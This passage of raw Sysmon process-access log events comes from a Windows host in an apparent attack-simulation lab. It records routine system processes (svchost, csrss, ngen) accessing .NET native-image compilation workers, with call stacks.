ramework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.493{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-BC03-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.477{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464C-6000-BC03-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.477{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-BC03-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-BB03-000000009A01}4568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.415{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-464C-6000-BB03-000000009A01}4568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.399{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-BB03-000000009A01}4568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.352{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-BA03-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.321{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464C-6000-BA03-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.321{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-BA03-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.180{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-B903-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.165{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464C-6000-B903-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.165{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-B903-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.055{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464C-6000-B803-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.040{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464C-6000-B803-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:32.040{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464C-6000-B803-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.993{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464B-6000-B703-000000009A01}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.915{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464D-6000-C503-000000009A01}4128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.899{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464D-6000-C503-000000009A01}4128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.899{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464D-6000-C503-000000009A01}4128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.852{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464D-6000-C403-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.837{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464D-6000-C403-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.837{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464D-6000-C403-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.665{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464D-6000-C303-000000009A01}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdl